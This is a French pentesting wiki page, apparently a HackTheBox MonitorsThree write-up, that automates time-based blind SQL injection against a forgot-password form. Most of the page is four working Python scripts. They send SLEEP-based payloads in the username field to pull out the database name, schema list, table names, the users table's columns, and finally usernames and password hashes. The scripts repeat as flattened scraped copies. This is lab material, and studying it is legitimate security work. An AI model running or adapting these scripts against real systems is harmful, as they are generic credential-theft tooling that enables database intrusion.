SQLI (Time Based) - Pentesting Web

Automatisation de l'exploitation avec un script Python

Nous avons développé un script Python pour automatiser l'extraction des données via l'injection SQL. Le script a permis d'extraire le nom de la base de données, les noms des tables, des colonnes, et finalement les données sensibles comme les noms d'utilisateur et les mots de passe.

Base de données:

Exemple de script pour extraire le nom de la base de données :

python3 exploit.py --url http://monitorsthree.htb/forgot_password.php --delay 1

import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuration des logs
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def sqli(target_url, delay=1):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info("Starting SQL injection attack...")
    
    for position in range(1, 100):
        character_found = False  # Indicateur pour vérifier si un caractère a été trouvé
        
        for character in characters:
            payload = {
                'username': f"admin' AND IF(SUBSTR(database(),{position},1)='{character}',SLEEP({delay}),1)-- -",
                'password': 'admin'
            }
            
            logger.debug(f"Testing: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Request failed: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Extracted data so far: {extracted_data}")
                character_found = True  # Un caractère a été trouvé
                break
        
        # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle
        if not character_found:
            logger.info(f"No character found at position {position}. Ending extraction.")
            break
    
    logger.info("SQL injection completed!")
    logger.info(f"Final extracted data: {extracted_data}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.")
    parser.add_argument("--url", required=True, help="Target URL for the SQL injection")
    parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)

Nom de la base de données : monitorsthree_db

Bases de données:

import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuration des logs
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + "_;:,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extracting database name at offset {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicateur pour vérifier si un caractère a été trouvé
        
        for character in characters:
            # Formatage de la requête SQL avec toutes les variables nécessaires
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testing: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Request failed: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Extracted data so far: {extracted_data}")
                character_found = True  # Un caractère a été trouvé
                break
        
        # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle
        if not character_found:
            logger.info(f"No character found at position {position}. Ending extraction.")
            break
    
    return extracted_data

def sqli(target_url, delay=1):
    # Requête pour extraire les noms des bases de données
    query_template = (
        "admin' AND IF(SUBSTR((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    databases = []
    offset = 0
    
    while True:
        database_name = extract_data(target_url, delay, query_template, offset)
        
        if not database_name:
            logger.info("No more databases found.")
            break
        
        databases.append(database_name)
        logger.info(f"Found database: {database_name}")
        offset += 1
    
    logger.info("SQL injection completed!")
    logger.info(f"List of databases: {databases}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.")
    parser.add_argument("--url", required=True, help="Target URL for the SQL injection")
    parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)

information_schema, monitorthree_db

Tables:

import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuration des logs
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extracting table name at offset {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicateur pour vérifier si un caractère a été trouvé
        
        for character in characters:
            # Formatage de la requête SQL avec toutes les variables nécessaires
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testing: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Request failed: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Extracted data so far: {extracted_data}")
                character_found = True  # Un caractère a été trouvé
                break
        
        # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle
        if not character_found:
            logger.info(f"No character found at position {position}. Ending extraction.")
            break
    
    return extracted_data

def sqli(target_url, delay=0.85):
    # Requête pour extraire les noms des tables de la base de données `monitorsthree_db`
    query_template = (
        "admin' AND IF(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='monitorsthree_db' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    tables = []
    offset = 0
    
    while True:
        table_name = extract_data(target_url, delay, query_template, offset)
        
        if not table_name:
            logger.info("No more tables found.")
            break
        
        tables.append(table_name)
        logger.info(f"Found table: {table_name}")
        offset += 1
    
    logger.info("SQL injection completed!")
    logger.info(f"List of tables in monitorsthree_db: {tables}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.")
    parser.add_argument("--url", required=True, help="Target URL for the SQL injection")
    parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)

Tables : invoices, customers, changelog, tasks, invoice_tasks, users

Colonnes:

import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuration des logs
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extracting column name at offset {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicateur pour vérifier si un caractère a été trouvé
        
        for character in characters:
            # Formatage de la requête SQL avec toutes les variables nécessaires
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testing: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Request failed: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Extracted data so far: {extracted_data}")
                character_found = True  # Un caractère a été trouvé
                break
        
        # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle
        if not character_found:
            logger.info(f"No character found at position {position}. Ending extraction.")
            break
    
    return extracted_data

def sqli(target_url, delay=0.85):
    # Requête pour extraire les noms des colonnes de la table `users`
    query_template = (
        "admin' AND IF(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='monitorsthree_db' AND table_name='users' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    columns = []
    offset = 0
    
    while True:
        column_name = extract_data(target_url, delay, query_template, offset)
        
        if not column_name:
            logger.info("No more columns found.")
            break
        
        columns.append(column_name)
        logger.info(f"Found column: {column_name}")
        offset += 1
    
    logger.info("SQL injection completed!")
    logger.info(f"List of columns in table 'users': {columns}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.")
    parser.add_argument("--url", required=True, help="Target URL for the SQL injection")
    parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection")
    
    args = parser.parse_args()
    
    sqli(args.url, args.delay)

Colonnes de la table users : id, username, email, password, name, position, dob, start_date, salary

Données extraites :

import sys
import signal
import time
import string
import requests
import argparse
import logging

# Configuration des logs
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
logger = logging.getLogger(__name__)

def def_handler(sig, frame):
    logger.info("\n\n[!] Exiting...\n")
    sys.exit(1)

signal.signal(signal.SIGINT, def_handler)

def extract_data(target_url, delay, query_template, offset):
    characters = string.ascii_lowercase + string.digits + ":,_-."
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    extracted_data = ""
    logger.info(f"Extracting data at offset {offset}...")
    
    for position in range(1, 100):
        character_found = False  # Indicateur pour vérifier si un caractère a été trouvé
        
        for character in characters:
            # Formatage de la requête SQL avec toutes les variables nécessaires
            payload = {
                'username': query_template.format(offset=offset, position=position, character=character, delay=delay),
                'password': 'admin'
            }
            
            logger.debug(f"Testing: {payload['username']}")
            start_time = time.time()
            
            try:
                response = requests.post(target_url, data=payload, headers=headers, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Request failed: {e}")
                continue
            
            elapsed_time = time.time() - start_time
            
            if elapsed_time >= delay:
                extracted_data += character
                logger.info(f"Extracted data so far: {extracted_data}")
                character_found = True  # Un caractère a été trouvé
                break
        
        # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle
        if not character_found:
            logger.info(f"No character found at position {position}. Ending extraction.")
            break
    
    return extracted_data

def extract_credentials(target_url, delay=0.85):
    # Requête pour extraire les usernames
    username_query_template = (
        "admin' AND IF(SUBSTR((SELECT username FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    # Requête pour extraire les passwords
    password_query_template = (
        "admin' AND IF(SUBSTR((SELECT password FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -"
    )
    
    credentials = []
    offset = 0
    
    while True:
        username = extract_data(target_url, delay, username_query_template, offset)
        password = extract_data(target_url, delay, password_query_template, offset)
        
        if not username or not password:
            logger.info("No more credentials found.")
            break
        
        credentials.append((username, password))
        logger.info(f"Found credentials: {username}:{password}")
        offset += 1
    
    logger.info("SQL injection completed!")
    logger.info(f"List of credentials: {credentials}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack to extract credentials.")
    parser.add_argument("--url", required=True, help="Target URL for the SQL injection")
    parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection")
    
    args = parser.parse_args()
    
    extract_credentials(args.url, args.delay)

Mis à jour il y a 1 an

import sys import signal import time import string import requests import argparse import logging # Configuration des logs logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") logger = logging.getLogger(__name__) def def_handler(sig, frame): logger.info("\n\n[!] Exiting...\n") sys.exit(1) signal.signal(signal.SIGINT, def_handler) def extract_data(target_url, delay, query_template, offset): characters = string.ascii_lowercase + string.digits + "_;:,_-." headers = { 'Content-Type': 'application/x-www-form-urlencoded' } extracted_data = "" logger.info(f"Extracting database name at offset {offset}...") for position in range(1, 100): character_found = False # Indicateur pour vérifier si un caractère a été trouvé for character in characters: # Formatage de la requête SQL avec toutes les variables nécessaires payload = { 'username': query_template.format(offset=offset, position=position, character=character, delay=delay), 'password': 'admin' } logger.debug(f"Testing: {payload['username']}") start_time = time.time() try: response = requests.post(target_url, data=payload, headers=headers, timeout=10) except requests.RequestException as e: logger.error(f"Request failed: {e}") continue elapsed_time = time.time() - start_time if elapsed_time >= delay: extracted_data += character logger.info(f"Extracted data so far: {extracted_data}") character_found = True # Un caractère a été trouvé break # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle if not character_found: logger.info(f"No character found at position {position}. Ending extraction.") break return extracted_data def sqli(target_url, delay=1): # Requête pour extraire les noms des bases de données query_template = ( "admin' AND IF(SUBSTR((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -" ) databases = [] offset = 0 while True: database_name = extract_data(target_url, delay, query_template, offset) if not database_name: logger.info("No more databases found.") break databases.append(database_name) logger.info(f"Found database: {database_name}") offset += 1 logger.info("SQL injection completed!") logger.info(f"List of databases: {databases}") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.") parser.add_argument("--url", required=True, help="Target URL for the SQL injection") parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection") args = parser.parse_args() sqli(args.url, args.delay)

import sys import signal import time import string import requests import argparse import logging # Configuration des logs logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") logger = logging.getLogger(__name__) def def_handler(sig, frame): logger.info("\n\n[!] Exiting...\n") sys.exit(1) signal.signal(signal.SIGINT, def_handler) def extract_data(target_url, delay, query_template, offset): characters = string.ascii_lowercase + string.digits + ":,_-." headers = { 'Content-Type': 'application/x-www-form-urlencoded' } extracted_data = "" logger.info(f"Extracting table name at offset {offset}...") for position in range(1, 100): character_found = False # Indicateur pour vérifier si un caractère a été trouvé for character in characters: # Formatage de la requête SQL avec toutes les variables nécessaires payload = { 'username': query_template.format(offset=offset, position=position, character=character, delay=delay), 'password': 'admin' } logger.debug(f"Testing: {payload['username']}") start_time = time.time() try: response = requests.post(target_url, data=payload, headers=headers, timeout=10) except requests.RequestException as e: logger.error(f"Request failed: {e}") continue elapsed_time = time.time() - start_time if elapsed_time >= delay: extracted_data += character logger.info(f"Extracted data so far: {extracted_data}") character_found = True # Un caractère a été trouvé break # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle if not character_found: logger.info(f"No character found at position {position}. Ending extraction.") break return extracted_data def sqli(target_url, delay=0.85): # Requête pour extraire les noms des tables de la base de données `monitorsthree_db` query_template = ( "admin' AND IF(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='monitorsthree_db' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -" ) tables = [] offset = 0 while True: table_name = extract_data(target_url, delay, query_template, offset) if not table_name: logger.info("No more tables found.") break tables.append(table_name) logger.info(f"Found table: {table_name}") offset += 1 logger.info("SQL injection completed!") logger.info(f"List of tables in monitorsthree_db: {tables}") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.") parser.add_argument("--url", required=True, help="Target URL for the SQL injection") parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection") args = parser.parse_args() sqli(args.url, args.delay)

import sys import signal import time import string import requests import argparse import logging # Configuration des logs logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") logger = logging.getLogger(__name__) def def_handler(sig, frame): logger.info("\n\n[!] Exiting...\n") sys.exit(1) signal.signal(signal.SIGINT, def_handler) def extract_data(target_url, delay, query_template, offset): characters = string.ascii_lowercase + string.digits + ":,_-." headers = { 'Content-Type': 'application/x-www-form-urlencoded' } extracted_data = "" logger.info(f"Extracting column name at offset {offset}...") for position in range(1, 100): character_found = False # Indicateur pour vérifier si un caractère a été trouvé for character in characters: # Formatage de la requête SQL avec toutes les variables nécessaires payload = { 'username': query_template.format(offset=offset, position=position, character=character, delay=delay), 'password': 'admin' } logger.debug(f"Testing: {payload['username']}") start_time = time.time() try: response = requests.post(target_url, data=payload, headers=headers, timeout=10) except requests.RequestException as e: logger.error(f"Request failed: {e}") continue elapsed_time = time.time() - start_time if elapsed_time >= delay: extracted_data += character logger.info(f"Extracted data so far: {extracted_data}") character_found = True # Un caractère a été trouvé break # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle if not character_found: logger.info(f"No character found at position {position}. Ending extraction.") break return extracted_data def sqli(target_url, delay=0.85): # Requête pour extraire les noms des colonnes de la table `users` query_template = ( "admin' AND IF(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema='monitorsthree_db' AND table_name='users' LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -" ) columns = [] offset = 0 while True: column_name = extract_data(target_url, delay, query_template, offset) if not column_name: logger.info("No more columns found.") break columns.append(column_name) logger.info(f"Found column: {column_name}") offset += 1 logger.info("SQL injection completed!") logger.info(f"List of columns in table 'users': {columns}") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack.") parser.add_argument("--url", required=True, help="Target URL for the SQL injection") parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection") args = parser.parse_args() sqli(args.url, args.delay)

import sys import signal import time import string import requests import argparse import logging # Configuration des logs logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s") logger = logging.getLogger(__name__) def def_handler(sig, frame): logger.info("\n\n[!] Exiting...\n") sys.exit(1) signal.signal(signal.SIGINT, def_handler) def extract_data(target_url, delay, query_template, offset): characters = string.ascii_lowercase + string.digits + ":,_-." headers = { 'Content-Type': 'application/x-www-form-urlencoded' } extracted_data = "" logger.info(f"Extracting data at offset {offset}...") for position in range(1, 100): character_found = False # Indicateur pour vérifier si un caractère a été trouvé for character in characters: # Formatage de la requête SQL avec toutes les variables nécessaires payload = { 'username': query_template.format(offset=offset, position=position, character=character, delay=delay), 'password': 'admin' } logger.debug(f"Testing: {payload['username']}") start_time = time.time() try: response = requests.post(target_url, data=payload, headers=headers, timeout=10) except requests.RequestException as e: logger.error(f"Request failed: {e}") continue elapsed_time = time.time() - start_time if elapsed_time >= delay: extracted_data += character logger.info(f"Extracted data so far: {extracted_data}") character_found = True # Un caractère a été trouvé break # Si aucun caractère n'a été trouvé pour cette position, on arrête la boucle if not character_found: logger.info(f"No character found at position {position}. Ending extraction.") break return extracted_data def extract_credentials(target_url, delay=0.85): # Requête pour extraire les usernames username_query_template = ( "admin' AND IF(SUBSTR((SELECT username FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -" ) # Requête pour extraire les passwords password_query_template = ( "admin' AND IF(SUBSTR((SELECT password FROM users LIMIT 1 OFFSET {offset}),{position},1)='{character}',SLEEP({delay}),1)-- -" ) credentials = [] offset = 0 while True: username = extract_data(target_url, delay, username_query_template, offset) password = extract_data(target_url, delay, password_query_template, offset) if not username or not password: logger.info("No more credentials found.") break credentials.append((username, password)) logger.info(f"Found credentials: {username}:{password}") offset += 1 logger.info("SQL injection completed!") logger.info(f"List of credentials: {credentials}") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Perform a time-based SQL injection attack to extract credentials.") parser.add_argument("--url", required=True, help="Target URL for the SQL injection") parser.add_argument("--delay", type=float, default=0.85, help="Delay time for the SQL injection") args = parser.parse_args() extract_credentials(args.url, args.delay)

hashtagAutomatisation de l'exploitation avec un script Python

hashtagBase de données:

hashtagBases de données:

hashtaginformation_schema, monitorthree_db

hashtagTables:

hashtagColonnes:

hashtagDonnées extraites :